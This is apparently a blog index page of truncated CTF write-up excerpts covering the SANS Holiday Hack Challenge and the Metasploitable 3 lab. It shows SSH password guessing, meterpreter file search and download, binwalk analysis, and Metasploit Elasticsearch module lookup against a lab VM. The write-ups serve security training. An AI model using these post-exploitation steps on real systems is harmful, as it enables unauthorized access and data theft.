The Internet of Stuff and Things

Tips from the North Pole Elves Hello again, Long time no see. I was working on the SANS Holiday Hack Challenge and at last I've submitted my write up today, although I couldn't find 2 NetWars coins. I'll share my solutions once the challenge is over after January 4th. For now, I want to share the tips that the Elves from the North Pole gave us to help with the challenges. The Elves in the North Pole give a lot of information and tips about possible vulnerabilities that can be exploited and tools to use. Me! ·          Alabaster Snowball : o    Mentions JSON parameter editing o    Recommends using BurpSuite ·          Holly Evergreen : o    Once all the Cranberry Pi pieces are found she provides the Cranbian image. ·          Shiny Upatree : o    Mentions APK files are just...

Hello, I just got this from the Metasploitable 3 team at Rapid7: CaptureTheFlag                                                                    1:57 PM (20 minutes ago) to CaptureTheFlag Hello, You are receiving this e-mail because according to our record, you are an active participant for the Metasploitable3 CTF. The CTF team would like to address two issues with these flags: Seven of Hearts and Jack of Diamonds,please read carefully. Seven of Hearts The Seven of Hearts is probably missing in your Metasploitable3 image, because we made a typo in the installation script. To make sure you have this card, you can either: Rebuild the image by doing: 1. In your repository, do "git pull" to update 2. Do: "vagrant destroy" 3. Do: "vagrant up", and this should rebuild the image. It will take a while.  Or update a...

The SANS Institute just published the 2016 SANS HOLIDAY HACK CHALLENGE! Good luck everyone! https://twitter.com/SANSPenTest/status/808059170696101888 THE 2016 SANS HOLIDAY HACK CHALLENGE

Metasplopitable 3 The Seven of Spades Once I guessed the Administrator user's password I was able to login through SSH in the Metasploitable3 server root@igor-kali : ~ # ssh Administrator@10.20.10.19 Administrator@10.20.10.19's password: Permission denied, please try again. Administrator@10.20.10.19's password: -sh-4.3$ -sh-4.3$ pwd /cygdrive/c/Users/Administrator I started navigating through the folders and ended up in Users/Public/Documents and looking at the list of file I found a PDF file.  -sh-4.3$ cd Public -sh-4.3$ ls Desktop  Documents  Downloads  Favorites  Libraries  Music  Pictures  Videos  desktop.ini -sh-4.3$ cd Documents/ -sh-4.3$ ls My Music  My Pictures  My Videos  desktop.ini  jack_of_hearts.docx  seven_of_spades.pdf I downloaded the file using scp root@igor-kali : ~ # scp Administrator@10.20.10.19:/cygdrive/c/Users/Public/Documents/seven_of_spades.pdf . Adm...

Metasploitable 3 The Ace of Hearts With the Ten of Diamonds, we also downloaded the Ace of Hearts, this time a JPEG file, let's take a look Not the card we are looking for Ok, this is not what we're looking for, I guess we want PNG files, let's take a closer look to the file with binwalk  root@igor-kali : ~ # binwalk ace_of_hearts.jpg DECIMAL HEXADECIMAL DESCRIPTION -------------------------------------------------------------------------------- 0 0x0 JPEG image data, JFIF standard 1.01 20087 0x4E77 Zip archive data, at least v1.0 to extract, compressed size: 459917, uncompressed size: 459917, name: ace_of_hearts.png 480150 0x75396 End of Zip archive Bingo, there's a Zip file attached to the JPEG file that has a ace_of_hearts.png file inside Some people will extract the ZIP file with 'dd' or with 'foremost' but I'll just make a copy and rename to zip and unzip...

Metasploitable 3 The Ten of Diamonds: We go back to our meterpreter thanks to Elasticsearch and run a search:  meterpreter > pwd C:\Program Files\elasticsearch-1.1.1 meterpreter > cd c:\ meterpreter > search [-] You must specify a valid file glob to search for, e.g. >search -f *.doc meterpreter > pwd C:\ meterpreter > search -f *diamonds* Found 6 results... C:\jack_of_diamonds.png C:\Program Files\OpenSSH\home\Public\Pictures\ten_of_diamonds.png (406134 bytes) C:\Users\Public\Pictures\ten_of_diamonds.png (406134 bytes) C:\inetpub\wwwroot\six_of_diamonds.zip (384916 bytes) C:\vagrant\resources\flags\six_of_diamonds.zip (384916 bytes) C:\vagrant\resources\flags\ten_of_diamonds.png (406134 bytes) meterpreter > if we start a shell and look at the folder we can see it's a SYMLINK to C:\Users  meterpreter > shell Process 1 created. Channel 2 created. Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microso...

Metasploitable 3 The Jack of clubs Remember I found this while troubleshooting the Queen of Hearts issue? meterpreter > search -f jack*.png Found 3 results... C:\jack_of_diamonds.png C:\Windows\System32\jack_of_clubs.png (523644 bytes) C:\vagrant\resources\flags\jack_of_clubs.png (523644 bytes) Let's go download it meterpreter > cd Windows meterpreter > cd System32 meterpreter > pwd C:\Windows\System32 meterpreter > download C:\Windows\System32\jack_of_clubs.png [*] downloading: jack_of_clubs.png -> jack_of_clubs.png [*] download : jack_of_clubs.png -> jack_of_clubs.png Done!

Metasploitable 3 The Queen of Hearts: Ok, I want a shell now... Wordpress might give me one but let's look at another interesting port: 9200/tcp  open  http       Elasticsearch REST API 1.1.1 (name: Ziggy Pig; Lucene 4.7) I'm a Splunk guy, so let's hit Elasticsearch :D I have no idea what to do with Elasticsearch so let's google Metasploit has something for Elasticsearch Let's load msfconsole and search for Elasticsearch: msf > search elasticsearch Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- auxiliary/scanner/elasticsearch/indices_enum normal ElasticSearch Indices Enumeration Utility auxiliary/scanner/http/elasticsearch_traversal normal ElasticSearch Snapshot API Directory Traversal exploit/multi/elast...